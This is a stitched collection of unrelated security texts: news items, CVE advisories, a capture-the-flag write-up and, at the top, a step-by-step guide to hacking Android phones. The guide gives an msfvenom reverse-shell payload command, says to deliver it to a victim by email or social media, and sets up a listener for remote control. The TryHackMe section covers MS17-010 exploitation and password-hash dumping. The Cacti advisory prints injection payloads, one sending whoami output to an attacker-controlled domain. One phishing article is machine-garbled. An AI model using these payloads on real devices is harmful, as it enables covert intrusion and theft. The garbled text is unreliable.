The following steps will guide you on how to hack an Android phone using Metasploit: 1. Install Metasploit on your computer: Metasploit can be installed on various operating systems such as Windows, Linux, and macOS. You can download the latest version of Metasploit from its official website. 2. Create a payload: Once you have installed Metasploit, you need to create a payload. The payload is a code that needs to be executed on the victim’s device. To create a payload, open the terminal and enter the following command: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o Replace with your IP address and with a port number of your choice. The filename.apk is the name of the file that will be created. 3. Send the payload to the victim: Once you have created the payload, you need to send it to the victim. You can send the payload via email, social media, or any other means. 4. Set up the listener: After sending the payload to the victim, you need to set up the listener. The listener is a code that waits for the connection from the payload. To set up the listener, open Metasploit and enter the following command: use exploit/multi/handlerset PAYLOAD android/meterpreter/reverse_tcpset LHOST set LPORT exploit This will start the listener and wait for the connection from the payload. 5. Gain access to the victim’s device: Once the victim executes the payload, the listener will establish a connection with the victim’s device. You can now gain access to the victim’s device and control it remotely.
Frequently Asked Questions (FAQ)
Q1: Is it legal to hack an Android phone using Metasploit? A: No, it is not legal to hack someone’s Android phone without their consent. Hacking without permission is a criminal offense and can lead to severe consequences. Q2: Can Metasploit be used for ethical hacking? A: Yes, Metasploit can be used for ethical hacking. Ethical hacking is a process of finding vulnerabilities in computer systems and networks and reporting them to the concerned authorities. Ethical hackers use tools like Metasploit to find vulnerabilities and secure the systems. Q3: How can I protect my Android phone from being hacked using Metasploit? A: You can protect your Android phone from being hacked using Metasploit by following these tips: – Keep your phone updated with the latest security patches. – Don’t install apps from unknown sources. – Use a strong password to lock your phone. – Avoid using public Wi-Fi networks. – Install an antivirus app on your phone. In conclusion, hacking an Android phone using Metasploit is a risky and illegal act. We have provided this guide for educational purposes only. We advise you to use this information responsibly and only for ethical purposes.
|
New! Vulnerability Priority Rating (VPR)
Tenable calculates a dynamic VPR for every vulnerability. VPR combines vulnerability information with threat intelligence and machine learning algorithms to predict which vulnerabilities are most likely to be exploited in attacks. Read more about what VPR is and how it's different from CVSS.
VPR Score: 6.7
SynopsisThe remote Scientific Linux host is missing one or more security updates.
DescriptionA heap-based buffer overflow flaw was found in Wireshark. If Wireshark opened a specially crafted capture file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. (CVE-2011-0024)
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2010-3445, CVE-2011-0538, CVE-2011-1139, CVE-2011-1140, CVE-2011-1141, CVE-2011-1143)
All running instances of Wireshark must be restarted for the update to take effect.
SolutionUpdate the affected wireshark and / or wireshark-gnome packages.
|
(Image from Pixabay)
Just when people thought ransomware is losing its appeal among cybercriminals, SecureList, Kaspersky Lab’s cyber threat research and reports, has been monitoring a new variant called KeyPass along with other researchers in the security community.
In SecureList’s blog post, KeyPass ransomware has been lingering and evolving in cyberspace that started this month while people are focused on the emerging cryptocurrency mining malware. It has been wreaking havoc globally with Brazil and Vietnam as the hardest hit.
Kaspersky describes KeyPass as an “indiscriminate piece of ransomware” that infected computers from Aug. 8 to Aug. 10 with no particular preference.
The security researchers explain that the ransomware uses “fake installers that download the ransomware module.” When it had infected the victim’s computer, it then copies “its executable to %LocalAppData% and launches it.”
Upon self-replication, the malware will pass the encryption key and victim ID.
KeyPass is indiscriminate as it also scans all files not minding file extensions. “It skips files located in a number of directories, the paths to which are hardcoded into the sample,” the researchers write.
“Every encrypted file gets an additional extension: “.KEYPASS” and ransom notes named “”!!!KEYPASS_DECRYPTION_INFO!!!.txt”” are saved in each processed directory,” Kaspersky Lab explains.
The malware then leaves its “ransom” note with TXT file extension where it commands the victims to “purchase a program and an individual key for file recovery.”
“Free of charge”
The criminals will lure the victims further by inviting them to send a couple of files for them to decrypt “free of charge.”
It will cost the victims $300 to get back their files. The criminals, who provide email addresses, up the urgency by demanding that the “price is valid only for the first 72 hours after infection.”
“However, we recommend not paying the ransom,” advises the researchers at Kaspersky Lab.
They explained: “If for some reason the computer is not connected to the Internet when the malware starts working, the malware cannot retrieve the personal encryption key from the C&C server. In that case, it uses a hard-coded key, meaning that the files can be decrypted without any trouble; the key is already at hand. Unfortunately, in other cases, you won’t get off so lightly: Despite the fairly simple implementation, the cybercriminals made no errors with the encryption.”
The researchers admit that “the tool for decrypting files hit by KeyPass has yet to be developed.” They gave simple, but almost self-explanatory precautions, to protect users from ransomware. These include being wary of what users click on the internet. If it looks suspicious, and users should always be suspicious, just refrain from clicking it. Back up all important files so the criminals won’t get a penny from users because the users have duplicates of files the criminals stole.
|
At a glance.
- Update on UHS ransomware incident.
- Facebook describes SilentFade.
- Smaug RaaS is a new offering in the criminal souks.
- Supply is high, and stolen RDP credentials show a corresponding drop in price.
- Comments on third-party risk.
Universal Health Services ransomware incident update.
The Washington Post reports that Universal Health Services have now determined that all two-hundred-fifty of its US facilities were affected by last weekend's Ryuk ransomware attack.
Facebook explains the SilentFade operation.
Two members of the Facebook security team appeared at the Virus Bulletin 2020 Conference on Thursday to deliver a presentation on SilentFade, one of the more elaborate malware operations the social media giant has ever faced, reports ZDNet. The operation, which impacted Facebook users from late 2018 until it was detected by the security team in 2019, was a complex scheme that combined malware with ad fraud. Here's the way it worked: operators would use a Windows Trojan to hack into the user’s browser and steal the user’s Facebook credentials. They would then collect any payment information stored in the user’s account and purchase Facebook ad space in the user’s name to place malicious ads for fake products. The ad links would infect new users with malware, beginning the cycle again. The threat actors even identified and exploited a bug that disabled Facebook security protocols. Over the course of just a few months, SilentFade stole over $4 million from users. Once Facebook caught on, the security team patched the bug and traced the operation to a Chinese software company, which Facebook sued in December 2019.
Smaug RaaS makes malware easy to purchase.
Threat detection outfit Anomali's Threat Research unit reports that they've uncovered a Ransomware-as-a-Service (RaaS) scheme they’re calling "Smaug." If cybercriminals want to carry out an attack but lack the means (or skill) to create their own ransomware, all they have to do is go to Smaug’s Onion site on the Dark Web, sign up, create a campaign, and purchase the malware for 0.2 Bitcoin, or about $2100 US. Smaug’s operators also assist with the purchase of decryption keys and victim tracking, all through a user-friendly dashboard interface. Anomali has traced Smaug to a threat actor (or possibly two sharing one account) that goes by the username "Corinda."
RDP login prices decrease as supply increases.
ZDNet reports that the price of stolen Remote Desktop Protocol (RDP) logins has fallen, probably because the market has become saturated with an over-abundance of supply. RDP allows employees to access a company’s network remotely, and is mostly used by teleworkers and IT administrators. RDP credentials tend to be low-hanging fruit for cybercriminals, as such credentials often involve simpler usernames and passwords that are easy to crack. Once stolen, they're sold in underground criminal markets. The drop in price may well be due to the way the COVID-19 pandemic has forced employees to access company networks remotely, and this has tended to flood the criminal market with a large number of credentials. To protect against RDP theft, organizations should encourage the use of strong passwords and multifactor authentication.
A look at third-party risk (more in sadness than anger).
Mounir Hahad, head of the Juniper Threat Labs at Juniper Networks shared some thoughts with us about the continuing Blackbaud affair:
“It used to be that computers were secure and that only communication was vulnerable to interception. But that time has long gone. We seem to focus so much on securing communication with encryption that we forget that data security has three essential components: securing data at rest so no one can steal it, securing communication so no one can snoop in on it and ensuring data integrity so no one can tamper with it. Every organization has to take a hard look at the data it stores and make sure no sensitive data is ever stored or moved around in the clear and that data integrity is verified at critical processing steps. Unfortunately, I have little faith this will just happen out of good will. We will need some legislation that mandates this policy and punishes organizations that egregiously ignore this mandate and end up exposing troves of sensitive customer data.”
|
tryhackme Blue write-up
- Name: Blue
- Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
- Room: tryhackme.com
[Task 1] Recon
Scan the machine
First we need to scan the machine to check for available ports and services
sudo nmap -sS -A <machine_ip>
Question: How many ports are open with a port number under 1000?
Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
“We can check the security problems of a device using scripts in Nmap, for example vuln script can identify common problems”
nmap <machine_ip> — script vuln
The machine seems to be vulnerable to the ms17–010 exploit
[Task 2] Gain Access
We know that the machine has a security problem and we can use Metasploit to exploit it
The next step is to find the appropriate exploit for the security problem (ms17–010)
Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
We have to select the desired exploit and set the required values
Set the Machine IP
set RHOSTS <machine_ip>
Question: Show options and set the one required value. What is the name of this value? (All caps for submission)
Run the exploit
You can see now that our exploit was executed and that we got a Windows host shell. In order to continue, we must use the Meterpreter shell to execute commands and upload files.
[Task 3] Escalate
We need to turn the shell into a meterpreter
Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
List the sessions and set the session number.
set SESSION 1
Question: Select this (use MODULE_PATH). Show options, what option are we required to change?
Now if we see the sessions again, a session meterpreter has been added
We got the meterpreter shell so now we can interactive shell to the attacker from which to explore the target machine and execute code.
Use ps command to list all the process that is running in the host system.
[Task 4] Cracking
Use hashdump to dump the user credentials
Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Question: Copy this password hash to a file and research how to crack it. What is the cracked password?
[Task 5] Find flags!
search the flags using :
search -f flag*.txt
thank you 🌏🔥
|
The imagined villains are in fact the victims, but more importantly the problem of spy software being prevalent in Israeli companies came as a result of one of the most comprehensive investigations involving computer crime ever undertaken. The Trojan had been introduced by providing companies with contaminated files, or sending a contaminated e-mail message to the companies. This also raises concerns that this evaded all the security measures in place at the companies infected.
Today our businesses depend on the exchange of electronic information with our business partners but many of the mechanisms that are used still rely too much on the goodwill of our business partners, or the integrity of the systems that they use.
Two of the most commonly used methods, FTP and Digitally Signed emails, using technologies such as PGP, are not really equipped to deal with this type of situation. In Israel, emails were being received from trusted business partners, so digital signatures on the email would possibly be considered trustworthy. In the case of files being shared using systems such as FTP, the presence of malware detectors was unable to identify anything inappropriate.
The bottom line is that we frequently depend too much on the trustworthiness of those we deal with, and unless we take appropriate measures to deal with the eventualities such as this, we are leaving ourselves vulnerable.
So are there measures we can take?
Do not expose your internal networks to external parties - The process of transferring files in and out of the enterprise must be carried out without exposing and risking the internal network. No type of direct or indirect communication can be allowed between the partner and the enterprise network.
Ensure that the repository for files being moved back and forth is secure. While information is waiting to be retrieved by the enterprise or sent to the business partner, it must reside in a secure location. This is especially critical when the intermediary storage is located on an insecure network, such as the enterprise’s DMZ, outsourced site, or even the internet. Additionally you should take the steps to define what format files will have, and to ensure that they can only be deposited if they are virus free.
The environment for exchanging data should be a sterile environment - Encryption and other security mechanisms are not helpful if the security layers where the data is being stored can be circumvented. Encryption is good for confidentiality, but does not protect data from intentional deletion or accidental modifications. In order to build multi-layered security, a sterile environment must exist to accommodate and protect the security infrastructure. Creating such a sterile environment requires the creation of a single data access channel to the machine and ensuring that only a strict protocol, that prohibits code from entering, is available for remote users. Many file exchange technologies do not run in sterile environments. For example FTP Servers, a common method, are frequently nothing more than applications running on insecure platforms
Protect your data when it is at rest - The cornerstone of protecting storage while at rest is encryption. Encryption ensures that the data is not readable and thus maintains its confidentiality. But encryption that places high demands on managing is ineffective. A common approach for many organizations is to use a Public/Private key approach, but this is generally considered to be ineffective because of the enormous effort to maintain such a system. A Symmetric encryption model ensures a manageable and effective method to secure the data
|
Cyberspace Threats to Our National Security and Econom
ISSA-NOVA Chapter Meeting
Presented by MAJ Mike Klipstein, PhD
U.S. Army Cyber Institute Chief, West Point Professor, NSA Coordinator
Thursday, January 17, 2018 5:30 PM – Networking & Dinner, 6:00 PM – ISSA-NOVA Program
Accelerating use of the Internet by people and devices is driving productivity and automation rapidly upwards. However, the risk of cyber attacks is likewise increasing dramatically. Dr. Mike Klipstein will detail the many risks and ways that our cyberspace is being threatened or attacked.
Whole industries, our economy, and even our national security are being harmed by major hacking incidents. The speaker will discuss the methods that hostile Nation States are using to damage our infrastructure and steal our hard-earned technological inventions.
Dr Klipstein is a Major in the U.S. Army who is assigned as a senior research scientist and the Chief of Outreach at the Army Cyber Institute (ACI) at West Point. His research at ACI includes cyberspace deterrence, operations in areas between peace and conflict, incorporating cyberspace operations into special ops, and creating partnerships between the cyber enterprise, industry, & academia.
Dr Michael Klipstein has been involved with cyberspace operations since 2010. In this time, he has assisted in defining priority intelligence requirements for USCYBERCOM while coordinating for the organization’s continuity of government network systems. Following this, Michael worked for two years in the vaunted Tailored Access Operations (TAO) as part of the National Security Agency. In TAO he coordinated with military services, national laboratories, industry, and academia for research & development and implementation of capabilities to use against a nation’s hard targets.
Then Michael led the Army’s National Mission Team, the offensive cyber team tasked to conduct operations to protect the critical infrastructure and key resources of the nation and to answer intelligence requirements as assigned by the President. Following success here, he was leveraged by the Army to create and train two national level cyber protection teams charged with protecting the Department of Defense’s networks from nation state actors. Leaving this in 2014, Michael attended the Naval Postgraduate School in California for the next three years. There he attained his PhD with his dissertation on “Quantifying Risk for Offensive Cyber Operations.” This dissertation is currently being implemented into a DARPA project..
Location: Atomicorp, 15049 Conference Center Drive, Chantilly, VA 20151
http://www.atomicorp.com Free parking in front of the building.
Registration Link: https://tinyurl.com/issa-nova-2019JAN17
Sponsored by ISSA-NOVA, the Northern Virginia Chapter of ISSA International
President: Bud Roth Vice Presidents: Walter Cekala, Michael Craghead, Seton Droppers, Sandra Fonseca,
Wendy Fox, Karen Frederick, Joe Klimkowski, Raymond Stamps
|
New Malware Technique Bypasses Traditional Defenses
Two UC San Diego students have demonstrated a way to turn good computer code into malicious instructions using a technique called "return-oriented programming."
A new way to subvert computers threatens to make traditional malware defenses obsolete.
Two University of California, San Diego computer science graduate students -- Erik Buchanan and Ryan Roemer -- have demonstrated a way to turn good computer code into malicious instructions using a technique called "return-oriented programming."
More Security Insights
- Get Actionable Insight with Security Intelligence for Mainframe Environments
- How Attackers Identify and Exploit Software and Network Vulnerabilities
White PapersMore >>
This differs from traditional malware, which typically relies on the injection of malicious code.
In a newly published research paper, "When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC," Buchanan and Roemer, along with U.C. San Diego computer science professors Stefan Savage and Hovav Shacham, describe how return-oriented programming resists current malware detection methods.
"[S]ince a return-oriented exploit relies on existing code and not injected instructions, it is resilient against code integrity defenses," the paper says. "It is thus undetectable to code signing techniques such as Tripwire, Authenticode, Intel's Trusted Execution Technology, or any 'Trusted Computing' technology using cryptographic attestation. It will similarly circumvent approaches that prevent control flow diversion outside legitimate regions (such as W^X) and most malicious code scanning techniques (such as anti-virus scanners)."
Shacham last year showed that return-oriented programming could be used to make x86 processors function maliciously without the injection of malicious code. But his attack required painstaking manual coding and seemed to rely on x86 processor design.
Buchanan and Roemer have developed way to automate the attack and generalize it to RISC processors.
Like many traditional attacks, return-oriented programming relies on a programming error to overwrite the runtime stack to take control of program execution. But rather than depending upon the injection of malicious code from a local or remote source, return-oriented programming assembles its malicious code from internal application instructions.
"The return-oriented computing approach amplifies the abilities of an attacker, so that merely subverting control flow on the stack is sufficient to construct arbitrary computations," the paper explains. "Moreover, since these computations are constructed from 'known good' instructions, they bypass existing defenses predicated on the assumption that the attacker introduces new code."
A U.C. San Diego news release likens the process to taking a lengthy book and writing a new story using only words culled from the book. In this analogy, the book represents the computer program and the new story represents the malicious instructions built using return-oriented programming.
As an example, Shacham suggests that the technique could be used to subvert a Web browser to record the user's password or send spam, using only the code that represents the Web browser.
The paper suggests there are possible defenses against return-oriented computing, but it cautions that if these approaches fail, "we may be forced to abandon the convenient model that code is statically either good or bad, and instead focus on dynamically distinguishing whether a particular execution stream exhibits good or bad behavior."
|
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
This signature detects Backdoor.Steladok activity on compromised machines.
Backdoor.Steladok is a Trojan horse that opens a back door on the compromised computer, steal information, and download potentially malicious files.
- Various Windows platform.
|
The popular “pac-resolver” NPM package fixed a serious remote code execution (RCE) flaw.
Agent or non-agent
This week, developer Tim perry revealed a high severity flaw in pac-resolver that may allow threat actors on the local network to execute arbitrary code in your Node.js process whenever it attempts to make an HTTP request.
function FindProxyForURL(url, host) // Send all *.example requests directly with no proxy: if (dnsDomainIs(host, '.example.com')) return 'DIRECT'; // Send every other request via this proxy: return 'PROXY proxy.example.com:8080';
In the example above, network requests to “example.com” will bypass the proxy, while the rest of the traffic must go through a proxy server.
And this is where the problem begins.
For example, an associated NPM package called Pac-Proxy-Agent, which is created by the same author and has over 2 million weekly downloads, provides PAC file support to Node.js applications. Pac-Proxy-Agent does this by taking the URL of a PAC file, retrieving the file, and then acting as a Node.js HTTP agent handling outgoing requests for your application. But Pac-Proxy-Agent fails to sandbox PAC files properly because it uses the vulnerable pac-resolver module, which additionally relies on “degenerator” to build the PAC function.
Degenerator is another package from the same author that allows transforming arbitrary code into a sandbox function using the “VM” module of Node.js. But the VM module was never intended to be used as a security mechanism, which is explicitly stated in the Node.js documents. Therefore, the output of degenerator, when used by a chain of packages like pac-resolver, pac-proxy-agent, and proxy-agent, poses a security risk.
Referring to a disclaimer in Node’s documentation saying, “The vm module is not a security mechanism. Do not use it to run untrusted code,” Perry said in a blog post , “This is an easy mistake to make – it’s a little text (frankly, it should be the title on this page and next to each method).” Perry further alleges that MongoDB also did “exactly the same thing in 2019 as well, with even worse consequences”. However, the CVE Perry link to involves a third-party tool named mongo-express. MongoDB confirmed to Ars that it has no affiliation with the package in question.
Perry further explained that “this creates a big problem. While VM tries to create an isolated environment in a separate context, there is a long list of easy ways to get to the original context and completely get out of the bin. sand … allowing the code inside the ‘sandbox’ to do whatever it wants on your system. “
With that, Perry shared proof of concept exploit code demonstrating how an attacker can exit the VM:
“That’s it, that’s all that’s needed to get out of the VM module sandbox. If you can get a vulnerable target to use this PAC file as a proxy configuration, then you can run code. arbitrary on his machine, ”he explained.
The vulnerability seriously affects those who use versions of pac-resolver prior to 5.0.0, even transitively in their Node.js application, and:
- Explicitly use PAC files for proxy configuration or
- Read and use the operating system proxy configuration in Node.js on systems with WPAD enabled or
- Use proxy configuration (
envvars, config files, remote config endpoints, command line arguments) from untrusted source
A remote attacker can, in any of these scenarios, configure a malicious PAC URL and execute arbitrary code on a computer every time an HTTP request is made using the proxy configuration.
The fix for pac-resolver in version 5.0.0 is simply to upgrade the degenerator version to 3.0.1. The main fix went into the degenerator itself and implements a more powerful sandboxing mechanism through the vm2 module to “prevent privilege escalation of untrusted code”.
Perry thanked Snyk for supporting the developer throughout the coordinated vulnerability disclosure process.
Affected developers should upgrade to pac-resolver version 5.0.0 or higher to address this severe vulnerability in their applications.
|
For those who’re seeking to purchase or promote phishing kits, seeking to study extra about how phishing works, or simply seeking to enter the fray on a voluntary foundation, your greatest guess is to go exploring on Telegram teams.
That is in response to a brand new report from cybersecurity researchers Kaspersky, which claims the favored encrypted immediate messaging platform has grow to be fairly the breeding floor for this explicit cohort of cybercriminals.
The researchers say that proper at this second, one can discover Telegram teams the place hackers are providing free phishing kits paired with pre-packaged instruments that enable new entrants to create phishing pages and pose as common manufacturers. There are additionally teams the place free phishing equipment contents are being shared, in addition to automated phishing web page creation. Additionally, a cybercrime aficionado might head over to Telegram and discover premium pages with customizable interfaces, anti-bot techniques, geoblocking, URL encryption, and social engineering components. Nevertheless, for these premium providers, one can anticipate to pay between $10 and $300.
Shopping for stolen items
It doesn’t finish there, although, as hackers are additionally utilizing Telegram to promote stolen delicate information (private info or banking particulars), provide phishing-as-a-service subscriptions, and one-time password bots.
Kaspersky additionally uncovered an attention-grabbing element on Ransomware-as-a-Service encryptors: the equipment encrypts the stolen information even for the operators, as a safeguard measure to ensure the ransomware’s creators get their share. In different phrases, even ransomware (opens in new tab) operators are being held for ransom, for the info they’ve stolen.
Phishing is at the moment one of the crucial common cybercriminal actions on the market, second solely to Enterprise E mail Compromise (which in itself is a type of phishing) and ransomware.
A latest Cofense report acknowledged that there was a 569% improve in phishing assaults in 2022, in comparison with the yr earlier than. Experiences associated to credential phishing had been up 478% final yr, as properly.
By way of: BleepingComputer (opens in new tab)
|
Natura, a provider of personal care and beauty products, suffered a data breach which compromised the personal information of more than 250,000 customers. The Brazilian cosmetics firm unknowingly leaked the personal information of customers who had ordered products from its official website.
Security firm SafetyDetective discovered two unsecured Amazon-hosted servers of 272GB and 1.3TB in size, that belongs to Natura. The unprotected servers consisted of more than 192 million records.
In addition, the unprotected server also had a secret Privacy Enhanced Mail (PEM) file that contained the password to an Amazon cloud-based server where the Natura website is hosted. If exploited, it could have allowed an attacker to install a digital card skimmer into the company’s website to steal users’ payment card details in real time.
It was found that payment information of 40,000 customers related to a third-party company Wirecard was also affected in the incident. Though the data breach was first discovered on April 12, 2020, researchers at SafetyDetective stated that they were able to confirm that hundreds of gigabytes of information was exposed since March 26, 2020.
“Since the data leak was discovered and Natura being informed, the size of the data leak has been reduced from 272GB to 27.2GB, according to server logs — this is a strong indication of purposeful impropriety aimed at concealing the severity of the leak. For example, an ill-intentioned hacker removing a precise number of records to conceal their actions,” SafetyDective said in a statement.
According to SafetyDetective, the exposed data includes personally identifiable information (PII) of customers like name, mother’s maiden name, DoB, nationality, gender, hashed login passwords with salts, username, and nickname. The other valuable data that leaked in the incident include, MOIP account details, API credentials with unencrypted passwords, recent purchases, telephone number, email and physical addresses, an access token for wirecard.com.br, their account login cookies, along with the archives containing logs from the servers.
After the discovery, SafetyDetective immediately reported the incident to Natura authorities. The unprotected server is now secured. “Instances of personally identifiable information being exposed could potentially lead to identity theft and fraud since they can be used by attackers for identification in various sites and locations. The risk of phishing and phone scams is also raised by the Natura data leak,” SafetyDetective added.
|
IBM Security Guardium Key Lifecycle Manager is a robust and comprehensive solution for managing cryptographic keys and certificates. However, recently a vulnerability has been identified, known as CVE-2023-47703, which pertains to the generation of error messages containing sensitive information. This vulnerability falls under the Common Weakness Enumeration (CWE) category 209, which deals with information exposure through an error message.
The CVE-2023-47703 vulnerability in IBM Security Guardium Key Lifecycle Manager can potentially expose sensitive information to unauthorized users. When an error occurs within the system, the error message that is generated may inadvertently include sensitive data such as usernames, passwords, or other confidential information. This can pose a significant risk to the security and integrity of an organization's sensitive data.
The impact of this vulnerability can be severe, as it can lead to unauthorized access and potential data breaches. Attackers with malicious intent can exploit this vulnerability to gain access to sensitive information, which can then be used for various nefarious purposes such as identity theft, unauthorized financial transactions, or corporate espionage.
To mitigate the risk associated with CVE-2023-47703, organizations using IBM Security Guardium Key Lifecycle Manager should take immediate action. IBM has released patches and updates to address this vulnerability, and it is crucial for organizations to apply these patches as soon as possible. Additionally, organizations should review and update their security protocols and policies to ensure that error messages do not contain sensitive information.
Furthermore, organizations should educate their employees about the potential risks associated with this vulnerability and the importance of maintaining data security. Training programs and awareness campaigns can help employees understand the significance of handling error messages appropriately and reporting any suspicious activities promptly.
In conclusion, the CVE-2023-47703 vulnerability in IBM Security Guardium Key Lifecycle Manager poses a significant risk to the security of sensitive information. Organizations must take proactive measures to address this vulnerability, including applying patches, updating security protocols, and educating employees. By doing so, organizations can enhance their overall data security posture and protect themselves from potential data breaches and unauthorized access.
Tired of attackers exploiting the same old vulnerabilities while you play an endless game of whack-a-mole? There's a better way.
Defused is the only deception platform that digitally twins your actual vulnerabilities to build threat intelligence on how attackers exploit them in the wild. By deploying camouflaged mimics of your real-world weak spots, Defused reveals attacker behaviors, priorities, and tooling based on their interaction with the decoys.
Stop trying to guess where attackers will strike next. Deploy the vulnerabilities they want and watch exactly how they exploit them. Defused converts vulnerability exposure into a intelligence-gathering opportunity. Gain the advantage over adversaries through cunning rather than complexity.
Check this and the other capabilities at DEFUSED
|
Multiple Zero-Day Security vulnerabilities in Top Endpoints Detecting and Responding (EDR) as well as Antivirus (AV) Solutions Found by SafeBreach Labs Researcher
In order to transform endpoint detection and response (EDR) and antivirus (AV) products into next-generation wipers. With the ability to affect hundreds of millions of endpoints worldwide, Or Yair. A security researcher at SafeBreach discovered a number of zero-day vulnerabilities. This wiper may delete practically any file on a system, including system files. And render a machine fully unbootable while operating with the permissions of an ordinary user. It accomplishes all of this without putting any code into the target files, making it completely undetected.
SafeBreach believes it is crucial that EDR and AV vendors proactively test their products against this type of vulnerability. If necessary, develop a remediation plan to ensure they are protected. While the team did its best to test the EDR and AV products we had access. It is not practical to test every product on the market.
Summarizing the importance of this research
“By openly sharing information about this discovery, our goal is to raise a warning flag about the existence of these zero-day vulnerabilities and the ability to exploit them. Organizations must understand that a wiper is much more dangerous if it uses a trusted entity on the system—in this case, an EDR or AV—to complete its malicious actions by proxy.
As cyber criminals continue to evolve their tactics, organizations must understand that having security controls does not mean an organization is secure. In fact, security controls may be a preferred target for attackers because of their high privileges and the very high level of trust they command. Organizations must be prepared to proactively test and evolve their defensive capabilities to protect themselves against this ever-changing threat landscape.”
For technical detail, please visit here: https://www.safebreach.com/resources/blog/safebreach-labs-researcher-discovers-multiple-zero-day-vulnerabilities/
|
The “Secure Attention” key combination can be used to break a pointer grab or a keyboard grab by an untrusted application. The key combination can also be used to verify if a pointer or a keyboard has been grabbed by a trusted application. On a multiheaded system that has been spoofed to display more than one trusted stripe, this key combination warps the pointer to the authorized trusted stripe.
To regain control of a Sun keyboard, use the following key combination.
Press the keys simultaneously to regain control of the current desktop focus. On the Sun keyboard, the diamond is the Meta key.
If the grab, such as a pointer, is not trusted, the pointer moves to the stripe. A trusted pointer does not move to the trusted stripe.
If you are not using a Sun keyboard, use the following key combination.
Press the keys simultaneously to regain control of the current desktop focus on your laptop.
On an x86 system that is using a Sun keyboard, the user has been prompted for a password. The cursor has been grabbed, and is in the password dialog box. To check that the prompt is trusted, the user presses the <Meta> <Stop> keys simultaneously. When the pointer remains in the dialog box, the user knows that the password prompt is trusted.
If the pointer had moved to the trusted stripe, the user would know that the password prompt could not be trusted, and contact the administrator.
In this example, a user is not running any trusted processes but cannot see the mouse pointer. To bring the pointer to the center of the trusted stripe, the user presses the <Meta> <Stop> keys simultaneously.
|
Improper Privilege Management
ToaruOS 1.99.2 is affected by incorrect access control via the kernel. Improper MMU management and having a low GDT address allows it to be mapped in userland. A call gate can then be written to escalate to CPL 0.
CWE-269 - Improper Privilege Management
An effective privilege management infrastructure provides valid users with required access and privileges across heterogeneous technology environments. An application with a faulty privilege management infrastructure allows higher than authorized privileges or enables privilege escalation. This can lead to security incidents such as system infiltration, data breach, and complete system takeover.
|
Apache WSS4J 1.6.5 contained a countermeasure for Bleichenbacher’s attack on XML Encryption, where the PKCS#1 v1.5 Key Transport Algorithm is used to encrypt symmetric keys as part of WS-Security. In particular, the fix avoided leaking information on whether decryption failed when decrypting the encrypted key or decrypting the message data.
Apache WSS4J all versions prior to 1.6.17 and 2.0.2.
Update to a fixed version
WSS4J 1.6.x : Should upgrade to 1.6.17 or later
WSS4J 2.0.x : Should upgrade to 2.0.2 or later
|
Cacti Command Injection Vulnerability
Cacti is an open-source, web-based network monitoring, performance, fault and configuration management framework designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.
A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.
Cacti Command Injection Vulnerability | CVE-2022-46169
The command injection vulnerability exists in the remote_agent.php file.
As seen from the code fix, the vulnerability in Cacti exists in the way it processes a specific HTTP query associated with a particular type of polling "action" that is defined in the database. In Cacti, users can define actions to monitor a single host or "poller." One of these poller types executes a PHP script, which expects correctly formatted return data. However, the vulnerability occurs because one of the query arguments used to execute these PHP scripts is not properly sanitized and is passed on to the execution call, resulting in command injection.
Here are some examples of exploits:
"poller_id=;ping%20-c%202%20whoami.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun" This is attempting to inject a command into the poller_id parameter by appending a command using a semicolon (;) followed by a command to ping a domain that is controlled by the attacker. The command is also using command substitution to execute the whoami command and insert the output into the command being executed. The purpose of this command is to send a ping request to a domain controlled by the attacker that includes the result of the whoami command in the URL, which could be used to identify the username of the user running the Cacti remote agent script.
The part of the request touch+%2Ftmp%2FTMSR is an attempt to execute a shell command on the server, which is to create a file named TMSR in the /tmp/ directory using the touch command. This request is malicious attempt to gain unauthorized access to the server running the Cacti network monitoring system.
SonicWall Capture Labs provides protection against this threat via following signature:
- IPS 15808:Cacti remote_agent Command Injection
Cacti has patched this vulnerability.
|
The number of Mac’s that have infected with the Flashback Trojan is already halved this week. According to Symantec there are ‘only’ 270,000 infected Mac’s connected to the Internet, compared with 600,000 last week. This is likely the result of the release of a number of removal tools and updates.
The researchers of Symantec calculated that the number of infected Mac on 11 April dropped from 380,000 to 270,000 the day after. Symantec expects that the decline will continue. Last week DrWeb reported that there were 600,000 Mac’s infected with the Flashback-malware. The Flashback malware is making use of a Java exploit that was already discovered in September last year, it is capable of intercepting passwords and other private data.
Many security companies have released removal tools in the past week, and this is likely the cause of the sudden drop in infected systems. The decline is likely to continue because Apple has released a removal tool on their own yesterday, which removes most variants of the Flashback Trojan and reconfigures java to stop these problems from happening again in the near future. One of the main changes is that Java applets will no longer be automatically executed.
Symantec can calculate the number of infected Mac’s by analyzing the botnet-traffic via a so-called sinkhole-domain. Infected systems are trying to contact the management servers that are given out commands. The domain that the researchers are using is a spoofed management service, which is capable of intercepting traffic between the bots. One of the things that the researchers found out is that the malware is using a domain name generator every day to contact the management server through another domain.
|
Massive Web Exploit Emerges
Page 1 of 1
One of the largest Web site exploits/compromises ever has hit the Web, with more than 10,000 compromised computers redirecting unsuspecting visitors to sites hosting malicious software payloads.
Most of the compromised sites -- 78 percent in total -- are in Italy but it is spreading around the world, according to Paul Ferguson, network architect with antivirus vendor Trend Micro. The compromised sites aren't the usual suspects, like porn, music swapping or piracy, but are legitimate sites for news, entertainment or information.
Because so many computers were hit at once, he suspects the bad guys behind it found a way to automate distribution of the payload.
This hack involves more than 10,000 compromised sites, meaning some manner of automating the process of distributing the code was done, said Ferguson.
The compromised sites examine the visitor's system and determine what if any vulnerabilities exist on the system. They are then redirected to a computer with a malicious payload that takes advantage of the unpatched system.
